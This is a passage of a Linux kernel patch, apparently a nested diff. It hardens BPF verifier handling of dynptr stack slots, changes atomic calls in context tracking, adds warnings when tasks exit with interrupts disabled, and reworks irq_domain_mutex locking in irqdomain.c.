+index 7ee2188272597..68455fd56eea5 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -638,11 +638,34 @@ static void print_liveness(struct bpf_verifier_env *env,
+ 		verbose(env, "D");
+ }
+ 
+-static int get_spi(s32 off)
++static int __get_spi(s32 off)
+ {
+ 	return (-off - 1) / BPF_REG_SIZE;
+ }
+ 
++static int dynptr_get_spi(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
++{
++	int off, spi;
++
++	if (!tnum_is_const(reg->var_off)) {
++		verbose(env, "dynptr has to be at a constant offset\n");
++		return -EINVAL;
++	}
++
++	off = reg->off + reg->var_off.value;
++	if (off % BPF_REG_SIZE) {
++		verbose(env, "cannot pass in dynptr at an offset=%d\n", off);
++		return -EINVAL;
++	}
++
++	spi = __get_spi(off);
++	if (spi < 1) {
++		verbose(env, "cannot pass in dynptr at an offset=%d\n", off);
++		return -EINVAL;
++	}
++	return spi;
++}
++
+ static bool is_spi_bounds_valid(struct bpf_func_state *state, int spi, int nr_slots)
+ {
+ 	int allocated_slots = state->allocated_stack / BPF_REG_SIZE;
+@@ -746,6 +769,8 @@ static void mark_dynptr_cb_reg(struct bpf_reg_state *reg,
+ 	__mark_dynptr_reg(reg, type, true);
+ }
+ 
++static int destroy_if_dynptr_stack_slot(struct bpf_verifier_env *env,
++				        struct bpf_func_state *state, int spi);
+ 
+ static int mark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_reg_state *reg,
+ 				   enum bpf_arg_type arg_type, int insn_idx)
+@@ -754,7 +779,9 @@ static int mark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_reg_
+ 	enum bpf_dynptr_type type;
+ 	int spi, i, id;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
+ 
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS))
+ 		return -EINVAL;
+@@ -781,6 +808,9 @@ static int mark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_reg_
+ 		state->stack[spi - 1].spilled_ptr.ref_obj_id = id;
+ 	}
+ 
++	state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
++	state->stack[spi - 1].spilled_ptr.live |= REG_LIVE_WRITTEN;
++
+ 	return 0;
+ }
+ 
+@@ -789,7 +819,9 @@ static int unmark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_re
+ 	struct bpf_func_state *state = func(env, reg);
+ 	int spi, i;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
+ 
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS))
+ 		return -EINVAL;
+@@ -805,6 +837,80 @@ static int unmark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_re
+ 
+ 	__mark_reg_not_init(env, &state->stack[spi].spilled_ptr);
+ 	__mark_reg_not_init(env, &state->stack[spi - 1].spilled_ptr);
++
++	/* Why do we need to set REG_LIVE_WRITTEN for STACK_INVALID slot?
++	 *
++	 * While we don't allow reading STACK_INVALID, it is still possible to
++	 * do <8 byte writes marking some but not all slots as STACK_MISC. Then,
++	 * helpers or insns can do partial read of that part without failing,
++	 * but check_stack_range_initialized, check_stack_read_var_off, and
++	 * check_stack_read_fixed_off will do mark_reg_read for all 8-bytes of
++	 * the slot conservatively. Hence we need to prevent those liveness
++	 * marking walks.
++	 *
++	 * This was not a problem before because STACK_INVALID is only set by
++	 * default (where the default reg state has its reg->parent as NULL), or
++	 * in clean_live_states after REG_LIVE_DONE (at which point
++	 * mark_reg_read won't walk reg->parent chain), but not randomly during
++	 * verifier state exploration (like we did above). Hence, for our case
++	 * parentage chain will still be live (i.e. reg->parent may be
++	 * non-NULL), while earlier reg->parent was NULL, so we need
++	 * REG_LIVE_WRITTEN to screen off read marker propagation when it is
++	 * done later on reads or by mark_dynptr_read as well to unnecessary
++	 * mark registers in verifier state.
++	 */
++	state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
++	state->stack[spi - 1].spilled_ptr.live |= REG_LIVE_WRITTEN;
++
++	return 0;
++}
++
++static void __mark_reg_unknown(const struct bpf_verifier_env *env,
++			       struct bpf_reg_state *reg);
++
++static int destroy_if_dynptr_stack_slot(struct bpf_verifier_env *env,
++				        struct bpf_func_state *state, int spi)
++{
++	int i;
++
++	/* We always ensure that STACK_DYNPTR is never set partially,
++	 * hence just checking for slot_type[0] is enough. This is
++	 * different for STACK_SPILL, where it may be only set for
++	 * 1 byte, so code has to use is_spilled_reg.
++	 */
++	if (state->stack[spi].slot_type[0] != STACK_DYNPTR)
++		return 0;
++
++	/* Reposition spi to first slot */
++	if (!state->stack[spi].spilled_ptr.dynptr.first_slot)
++		spi = spi + 1;
++
++	if (dynptr_type_refcounted(state->stack[spi].spilled_ptr.dynptr.type)) {
++		verbose(env, "cannot overwrite referenced dynptr\n");
++		return -EINVAL;
++	}
++
++	mark_stack_slot_scratched(env, spi);
++	mark_stack_slot_scratched(env, spi - 1);
++
++	/* Writing partially to one dynptr stack slot destroys both. */
++	for (i = 0; i < BPF_REG_SIZE; i++) {
++		state->stack[spi].slot_type[i] = STACK_INVALID;
++		state->stack[spi - 1].slot_type[i] = STACK_INVALID;
++	}
++
++	/* TODO: Invalidate any slices associated with this dynptr */
++
++	/* Do not release reference state, we are destroying dynptr on stack,
++	 * not using some helper to release it. Just reset register.
++	 */
++	__mark_reg_not_init(env, &state->stack[spi].spilled_ptr);
++	__mark_reg_not_init(env, &state->stack[spi - 1].spilled_ptr);
++
++	/* Same reason as unmark_stack_slots_dynptr above */
++	state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
++	state->stack[spi - 1].spilled_ptr.live |= REG_LIVE_WRITTEN;
++
+ 	return 0;
+ }
+ 
+@@ -816,7 +922,11 @@ static bool is_dynptr_reg_valid_uninit(struct bpf_verifier_env *env, struct bpf_
+ 	if (reg->type == CONST_PTR_TO_DYNPTR)
+ 		return false;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return false;
++
++	/* We will do check_mem_access to check and update stack bounds later */
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS))
+ 		return true;
+ 
+@@ -832,14 +942,15 @@ static bool is_dynptr_reg_valid_uninit(struct bpf_verifier_env *env, struct bpf_
+ static bool is_dynptr_reg_valid_init(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
+ {
+ 	struct bpf_func_state *state = func(env, reg);
+-	int spi;
+-	int i;
++	int spi, i;
+ 
+ 	/* This already represents first slot of initialized bpf_dynptr */
+ 	if (reg->type == CONST_PTR_TO_DYNPTR)
+ 		return true;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return false;
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS) ||
+ 	    !state->stack[spi].spilled_ptr.dynptr.first_slot)
+ 		return false;
+@@ -868,7 +979,9 @@ static bool is_dynptr_type_expected(struct bpf_verifier_env *env, struct bpf_reg
+ 	if (reg->type == CONST_PTR_TO_DYNPTR) {
+ 		return reg->dynptr.type == dynptr_type;
+ 	} else {
+-		spi = get_spi(reg->off);
++		spi = dynptr_get_spi(env, reg);
++		if (spi < 0)
++			return false;
+ 		return state->stack[spi].spilled_ptr.dynptr.type == dynptr_type;
+ 	}
+ }
+@@ -2386,6 +2499,32 @@ static int mark_reg_read(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
++static int mark_dynptr_read(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
++{
++	struct bpf_func_state *state = func(env, reg);
++	int spi, ret;
++
++	/* For CONST_PTR_TO_DYNPTR, it must have already been done by
++	 * check_reg_arg in check_helper_call and mark_btf_func_reg_size in
++	 * check_kfunc_call.
++	 */
++	if (reg->type == CONST_PTR_TO_DYNPTR)
++		return 0;
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
++	/* Caller ensures dynptr is valid and initialized, which means spi is in
++	 * bounds and spi is the first dynptr slot. Simply mark stack slot as
++	 * read.
++	 */
++	ret = mark_reg_read(env, &state->stack[spi].spilled_ptr,
++			    state->stack[spi].spilled_ptr.parent, REG_LIVE_READ64);
++	if (ret)
++		return ret;
++	return mark_reg_read(env, &state->stack[spi - 1].spilled_ptr,
++			     state->stack[spi - 1].spilled_ptr.parent, REG_LIVE_READ64);
++}
++
+ /* This function is supposed to be used by the following 32-bit optimization
+  * code only. It returns TRUE if the source or destination register operates
+  * on 64-bit, otherwise return FALSE.
+@@ -3318,6 +3457,10 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 			env->insn_aux_data[insn_idx].sanitize_stack_spill = true;
+ 	}
+ 
++	err = destroy_if_dynptr_stack_slot(env, state, spi);
++	if (err)
++		return err;
++
+ 	mark_stack_slot_scratched(env, spi);
+ 	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
+ 	    !register_is_null(reg) && env->bpf_capable) {
+@@ -3431,6 +3574,14 @@ static int check_stack_write_var_off(struct bpf_verifier_env *env,
+ 	if (err)
+ 		return err;
+ 
++	for (i = min_off; i < max_off; i++) {
++		int spi;
++
++		spi = __get_spi(i);
++		err = destroy_if_dynptr_stack_slot(env, state, spi);
++		if (err)
++			return err;
++	}
+ 
+ 	/* Variable offset writes destroy any spilled pointers in range. */
+ 	for (i = min_off; i < max_off; i++) {
+@@ -5458,6 +5609,31 @@ static int check_stack_range_initialized(
+ 	}
+ 
+ 	if (meta && meta->raw_mode) {
++		/* Ensure we won't be overwriting dynptrs when simulating byte
++		 * by byte access in check_helper_call using meta.access_size.
++		 * This would be a problem if we have a helper in the future
++		 * which takes:
++		 *
++		 *	helper(uninit_mem, len, dynptr)
++		 *
++		 * Now, uninint_mem may overlap with dynptr pointer. Hence, it
++		 * may end up writing to dynptr itself when touching memory from
++		 * arg 1. This can be relaxed on a case by case basis for known
++		 * safe cases, but reject due to the possibilitiy of aliasing by
++		 * default.
++		 */
++		for (i = min_off; i < max_off + access_size; i++) {
++			int stack_off = -i - 1;
++
++			spi = __get_spi(i);
++			/* raw_mode may write past allocated_stack */
++			if (state->allocated_stack <= stack_off)
++				continue;
++			if (state->stack[spi].slot_type[stack_off % BPF_REG_SIZE] == STACK_DYNPTR) {
++				verbose(env, "potential write to dynptr at off=%d disallowed\n", i);
++				return -EACCES;
++			}
++		}
+ 		meta->access_size = access_size;
+ 		meta->regno = regno;
+ 		return 0;
+@@ -5955,12 +6131,15 @@ int process_dynptr_func(struct bpf_verifier_env *env, int regno,
+ 	}
+ 	/* CONST_PTR_TO_DYNPTR already has fixed and var_off as 0 due to
+ 	 * check_func_arg_reg_off's logic. We only need to check offset
+-	 * alignment for PTR_TO_STACK.
++	 * and its alignment for PTR_TO_STACK.
+ 	 */
+-	if (reg->type == PTR_TO_STACK && (reg->off % BPF_REG_SIZE)) {
+-		verbose(env, "cannot pass in dynptr at an offset=%d\n", reg->off);
+-		return -EINVAL;
++	if (reg->type == PTR_TO_STACK) {
++		int err = dynptr_get_spi(env, reg);
++
++		if (err < 0)
++			return err;
+ 	}
++
+ 	/*  MEM_UNINIT - Points to memory that is an appropriate candidate for
+ 	 *		 constructing a mutable bpf_dynptr object.
+ 	 *
+@@ -5992,6 +6171,8 @@ int process_dynptr_func(struct bpf_verifier_env *env, int regno,
+ 
+ 		meta->uninit_dynptr_regno = regno;
+ 	} else /* MEM_RDONLY and None case from above */ {
++		int err;
++
+ 		/* For the reg->type == PTR_TO_STACK case, bpf_dynptr is never const */
+ 		if (reg->type == CONST_PTR_TO_DYNPTR && !(arg_type & MEM_RDONLY)) {
+ 			verbose(env, "cannot pass pointer to const bpf_dynptr, the helper mutates it\n");
+@@ -6025,6 +6206,10 @@ int process_dynptr_func(struct bpf_verifier_env *env, int regno,
+ 				err_extra, regno);
+ 			return -EINVAL;
+ 		}
++
++		err = mark_dynptr_read(env, reg);
++		if (err)
++			return err;
+ 	}
+ 	return 0;
+ }
+@@ -6362,15 +6547,16 @@ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 	}
+ }
+ 
+-static u32 dynptr_ref_obj_id(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
++static int dynptr_ref_obj_id(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
+ {
+ 	struct bpf_func_state *state = func(env, reg);
+ 	int spi;
+ 
+ 	if (reg->type == CONST_PTR_TO_DYNPTR)
+ 		return reg->ref_obj_id;
+-
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
+ 	return state->stack[spi].spilled_ptr.ref_obj_id;
+ }
+ 
+@@ -6444,7 +6630,9 @@ skip_type_check:
+ 			 * PTR_TO_STACK.
+ 			 */
+ 			if (reg->type == PTR_TO_STACK) {
+-				spi = get_spi(reg->off);
++				spi = dynptr_get_spi(env, reg);
++				if (spi < 0)
++					return spi;
+ 				if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS) ||
+ 				    !state->stack[spi].spilled_ptr.ref_obj_id) {
+ 					verbose(env, "arg %d is an unacquired reference\n", regno);
+@@ -7933,13 +8121,19 @@ static int check_helper_call(struct bpf_verifier_env *env, struct bpf_insn *insn
+ 		for (i = 0; i < MAX_BPF_FUNC_REG_ARGS; i++) {
+ 			if (arg_type_is_dynptr(fn->arg_type[i])) {
+ 				struct bpf_reg_state *reg = &regs[BPF_REG_1 + i];
++				int ref_obj_id;
+ 
+ 				if (meta.ref_obj_id) {
+ 					verbose(env, "verifier internal error: meta.ref_obj_id already set\n");
+ 					return -EFAULT;
+ 				}
+ 
+-				meta.ref_obj_id = dynptr_ref_obj_id(env, reg);
++				ref_obj_id = dynptr_ref_obj_id(env, reg);
++				if (ref_obj_id < 0) {
++					verbose(env, "verifier internal error: failed to obtain dynptr ref_obj_id\n");
++					return ref_obj_id;
++				}
++				meta.ref_obj_id = ref_obj_id;
+ 				break;
+ 			}
+ 		}
+@@ -13231,10 +13425,9 @@ static bool stacksafe(struct bpf_verifier_env *env, struct bpf_func_state *old,
+ 			return false;
+ 		if (i % BPF_REG_SIZE != BPF_REG_SIZE - 1)
+ 			continue;
+-		if (!is_spilled_reg(&old->stack[spi]))
+-			continue;
+-		if (!regsafe(env, &old->stack[spi].spilled_ptr,
+-			     &cur->stack[spi].spilled_ptr, idmap))
++		/* Both old and cur are having same slot_type */
++		switch (old->stack[spi].slot_type[BPF_REG_SIZE - 1]) {
++		case STACK_SPILL:
+ 			/* when explored and current stack slot are both storing
+ 			 * spilled registers, check that stored pointers types
+ 			 * are the same as well.
+@@ -13245,7 +13438,30 @@ static bool stacksafe(struct bpf_verifier_env *env, struct bpf_func_state *old,
+ 			 * such verifier states are not equivalent.
+ 			 * return false to continue verification of this path
+ 			 */
++			if (!regsafe(env, &old->stack[spi].spilled_ptr,
++				     &cur->stack[spi].spilled_ptr, idmap))
++				return false;
++			break;
++		case STACK_DYNPTR:
++		{
++			const struct bpf_reg_state *old_reg, *cur_reg;
++
++			old_reg = &old->stack[spi].spilled_ptr;
++			cur_reg = &cur->stack[spi].spilled_ptr;
++			if (old_reg->dynptr.type != cur_reg->dynptr.type ||
++			    old_reg->dynptr.first_slot != cur_reg->dynptr.first_slot ||
++			    !check_ids(old_reg->ref_obj_id, cur_reg->ref_obj_id, idmap))
++				return false;
++			break;
++		}
++		case STACK_MISC:
++		case STACK_ZERO:
++		case STACK_INVALID:
++			continue;
++		/* Ensure that new unhandled slot types return false by default */
++		default:
+ 			return false;
++		}
+ 	}
+ 	return true;
+ }
+diff --git a/kernel/context_tracking.c b/kernel/context_tracking.c
+index 77978e3723771..a09f1c19336ae 100644
+--- a/kernel/context_tracking.c
++++ b/kernel/context_tracking.c
+@@ -510,7 +510,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 * In this we case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 		} else {
+ 			/*
+ 			 * Even if context tracking is disabled on this CPU, because it's outside
+@@ -527,7 +527,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -535,7 +535,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_add(state, &ct->state);
++				arch_atomic_add(state, &ct->state);
+ 			}
+ 		}
+ 	}
+@@ -630,12 +630,12 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 			 * In this we case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 
+ 		} else {
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -643,7 +643,7 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_sub(state, &ct->state);
++				arch_atomic_sub(state, &ct->state);
+ 			}
+ 		}
+ 	}
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 15dc2ec80c467..f2afdb0add7c5 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -807,6 +807,8 @@ void __noreturn do_exit(long code)
+ 	struct task_struct *tsk = current;
+ 	int group_dead;
+ 
++	WARN_ON(irqs_disabled());
++
+ 	synchronize_group_exit(tsk, code);
+ 
+ 	WARN_ON(tsk->plug);
+@@ -938,6 +940,11 @@ void __noreturn make_task_dead(int signr)
+ 	if (unlikely(!tsk->pid))
+ 		panic("Attempted to kill the idle task!");
+ 
++	if (unlikely(irqs_disabled())) {
++		pr_info("note: %s[%d] exited with irqs disabled\n",
++			current->comm, task_pid_nr(current));
++		local_irq_enable();
++	}
+ 	if (unlikely(in_atomic())) {
+ 		pr_info("note: %s[%d] exited with preempt_count %d\n",
+ 			current->comm, task_pid_nr(current),
+@@ -1898,7 +1905,14 @@ bool thread_group_exited(struct pid *pid)
+ }
+ EXPORT_SYMBOL(thread_group_exited);
+ 
+-__weak void abort(void)
++/*
++ * This needs to be __function_aligned as GCC implicitly makes any
++ * implementation of abort() cold and drops alignment specified by
++ * -falign-functions=N.
++ *
++ * See https://gcc.gnu.org/bugzilla/show_bug.cgi?id=88345#c11
++ */
++__weak __function_aligned void abort(void)
+ {
+ 	BUG();
+ 
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index 798a9042421fc..8e14805c55083 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -25,6 +25,9 @@ static DEFINE_MUTEX(irq_domain_mutex);
+ 
+ static struct irq_domain *irq_default_domain;
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity);
+ static void irq_domain_check_hierarchy(struct irq_domain *domain);
+ 
+ struct irqchip_fwid {
+@@ -123,23 +126,12 @@ void irq_domain_free_fwnode(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(irq_domain_free_fwnode);
+ 
+-/**
+- * __irq_domain_add() - Allocate a new irq_domain data structure
+- * @fwnode: firmware node for the interrupt controller
+- * @size: Size of linear map; 0 for radix mapping only
+- * @hwirq_max: Maximum number of interrupts supported by controller
+- * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
+- *              direct mapping
+- * @ops: domain callbacks
+- * @host_data: Controller private data pointer
+- *
+- * Allocates and initializes an irq_domain structure.
+- * Returns pointer to IRQ domain, or NULL on failure.
+- */
+-struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
+-				    irq_hw_number_t hwirq_max, int direct_max,
+-				    const struct irq_domain_ops *ops,
+-				    void *host_data)
++static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
++					      unsigned int size,
++					      irq_hw_number_t hwirq_max,
++					      int direct_max,
++					      const struct irq_domain_ops *ops,
++					      void *host_data)
+ {
+ 	struct irqchip_fwid *fwid;
+ 	struct irq_domain *domain;
+@@ -227,12 +219,44 @@ struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int s
+ 
+ 	irq_domain_check_hierarchy(domain);
+ 
++	return domain;
++}
++
++static void __irq_domain_publish(struct irq_domain *domain)
++{
+ 	mutex_lock(&irq_domain_mutex);
+ 	debugfs_add_domain_dir(domain);
+ 	list_add(&domain->link, &irq_domain_list);
+ 	mutex_unlock(&irq_domain_mutex);
+ 
+ 	pr_debug("Added domain %s\n", domain->name);
++}
++
++/**
++ * __irq_domain_add() - Allocate a new irq_domain data structure
++ * @fwnode: firmware node for the interrupt controller
++ * @size: Size of linear map; 0 for radix mapping only
++ * @hwirq_max: Maximum number of interrupts supported by controller
++ * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
++ *              direct mapping
++ * @ops: domain callbacks
++ * @host_data: Controller private data pointer
++ *
++ * Allocates and initializes an irq_domain structure.
++ * Returns pointer to IRQ domain, or NULL on failure.
++ */
++struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
++				    irq_hw_number_t hwirq_max, int direct_max,
++				    const struct irq_domain_ops *ops,
++				    void *host_data)
++{
++	struct irq_domain *domain;
++
++	domain = __irq_domain_create(fwnode, size, hwirq_max, direct_max,
++				     ops, host_data);
++	if (domain)
++		__irq_domain_publish(domain);
++
+ 	return domain;
+ }
+ EXPORT_SYMBOL_GPL(__irq_domain_add);
+@@ -538,6 +562,9 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 		return;
+ 
+ 	hwirq = irq_data->hwirq;
++
++	mutex_lock(&irq_domain_mutex);
++
+ 	irq_set_status_flags(irq, IRQ_NOREQUEST);
+ 
+ 	/* remove chip and handler */
+@@ -557,10 +584,12 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 
+ 	/* Clear reverse map for this hwirq */
+ 	irq_domain_clear_mapping(domain, hwirq);
++
++	mutex_unlock(&irq_domain_mutex);
+ }
+ 
+-int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+-			 irq_hw_number_t hwirq)
++static int irq_domain_associate_locked(struct irq_domain *domain, unsigned int virq,
++				       irq_hw_number_t hwirq)
+ {
+ 	struct irq_data *irq_data = irq_get_irq_data(virq);
+ 	int ret;
+@@ -573,7 +602,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 	if (WARN(irq_data->domain, "error: virq%i is already associated", virq))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	irq_data->hwirq = hwirq;
+ 	irq_data->domain = domain;
+ 	if (domain->ops->map) {
+@@ -590,7 +618,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 			}
+ 			irq_data->domain = NULL;
+ 			irq_data->hwirq = 0;
+-			mutex_unlock(&irq_domain_mutex);
+ 			return ret;
+ 		}
+ 
+@@ -601,12 +628,23 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 
+ 	domain->mapcount++;
+ 	irq_domain_set_mapping(domain, hwirq, irq_data);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	irq_clear_status_flags(virq, IRQ_NOREQUEST);
+ 
+ 	return 0;
+ }
++
++int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
++			 irq_hw_number_t hwirq)
++{
++	int ret;
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_associate_locked(domain, virq, hwirq);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(irq_domain_associate);
+ 
+ void irq_domain_associate_many(struct irq_domain *domain, unsigned int irq_base,
+@@ -668,6 +706,34 @@ unsigned int irq_create_direct_mapping(struct irq_domain *domain)
+ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+ #endif
+ 
++static unsigned int irq_create_mapping_affinity_locked(struct irq_domain *domain,
++						       irq_hw_number_t hwirq,
++						       const struct irq_affinity_desc *affinity)
++{
++	struct device_node *of_node = irq_domain_get_of_node(domain);
++	int virq;
++
++	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
++
++	/* Allocate a virtual interrupt number */
++	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
++				      affinity);
++	if (virq <= 0) {
++		pr_debug("-> virq allocation failed\n");
++		return 0;
++	}
++
++	if (irq_domain_associate_locked(domain, virq, hwirq)) {
++		irq_free_desc(virq);
++		return 0;
++	}
++
++	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
++		hwirq, of_node_full_name(of_node), virq);
++
++	return virq;
++}
++
+ /**
+  * irq_create_mapping_affinity() - Map a hardware interrupt into linux irq space
+  * @domain: domain owning this hardware interrupt or NULL for default domain
+@@ -680,14 +746,11 @@ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+  * on the number returned from that call.
+  */
+ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+-				       irq_hw_number_t hwirq,
+-				       const struct irq_affinity_desc *affinity)
++					 irq_hw_number_t hwirq,
++					 const struct irq_affinity_desc *affinity)
+ {
+-	struct device_node *of_node;
+ 	int virq;
+ 
+-	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
+-
+ 	/* Look for default domain if necessary */
+ 	if (domain == NULL)
+ 		domain = irq_default_domain;
+@@ -695,32 +758,19 @@ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+ 		WARN(1, "%s(, %lx) called with NULL domain\n", __func__, hwirq);
+ 		return 0;
+ 	}
+-	pr_debug("-> using domain @%p\n", domain);
+ 
+-	of_node = irq_domain_get_of_node(domain);
++	mutex_lock(&irq_domain_mutex);
+ 
+ 	/* Check if mapping already exists */
+ 	virq = irq_find_mapping(domain, hwirq);
+ 	if (virq) {
+-		pr_debug("-> existing mapping on virq %d\n", virq);
+-		return virq;
+-	}
+-
+-	/* Allocate a virtual interrupt number */
+-	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
+-				      affinity);
+-	if (virq <= 0) {
+-		pr_debug("-> virq allocation failed\n");
+-		return 0;
++		pr_debug("existing mapping on virq %d\n", virq);
++		goto out;
+ 	}
+ 
+-	if (irq_domain_associate(domain, virq, hwirq)) {
+-		irq_free_desc(virq);
+-		return 0;
+-	}
+-
+-	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
+-		hwirq, of_node_full_name(of_node), virq);
++	virq = irq_create_mapping_affinity_locked(domain, hwirq, affinity);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -789,6 +839,8 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 	if (WARN_ON(type & ~IRQ_TYPE_SENSE_MASK))
+ 		type &= IRQ_TYPE_SENSE_MASK;
+ 
++	mutex_lock(&irq_domain_mutex);
++
+ 	/*
+ 	 * If we've already configured this interrupt,
+ 	 * don't do it again, or hell will break loose.
+@@ -801,7 +853,7 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 * interrupt number.
+ 		 */
+ 		if (type == IRQ_TYPE_NONE || type == irq_get_trigger_type(virq))
+-			return virq;
++			goto out;
+ 
+ 		/*
+ 		 * If the trigger type has not been set yet, then set
+@@ -809,40 +861,45 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 */
+ 		if (irq_get_trigger_type(virq) == IRQ_TYPE_NONE) {
+ 			irq_data = irq_get_irq_data(virq);
+-			if (!irq_data)
+-				return 0;
++			if (!irq_data) {
++				virq = 0;
++				goto out;
++			}
+ 
+ 			irqd_set_trigger_type(irq_data, type);
+-			return virq;
++			goto out;
+ 		}
+ 
+ 		pr_warn("type mismatch, failed to map hwirq-%lu for %s!\n",
+ 			hwirq, of_node_full_name(to_of_node(fwspec->fwnode)));
+-		return 0;
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	if (irq_domain_is_hierarchy(domain)) {
+-		virq = irq_domain_alloc_irqs(domain, 1, NUMA_NO_NODE, fwspec);
+-		if (virq <= 0)
+-			return 0;
++		virq = irq_domain_alloc_irqs_locked(domain, -1, 1, NUMA_NO_NODE,
++						    fwspec, false, NULL);
++		if (virq <= 0) {
++			virq = 0;
++			goto out;
++		}
+ 	} else {
+ 		/* Create mapping */
+-		virq = irq_create_mapping(domain, hwirq);
++		virq = irq_create_mapping_affinity_locked(domain, hwirq, NULL);
+ 		if (!virq)
+-			return virq;
++			goto out;
+ 	}
+ 
+ 	irq_data = irq_get_irq_data(virq);
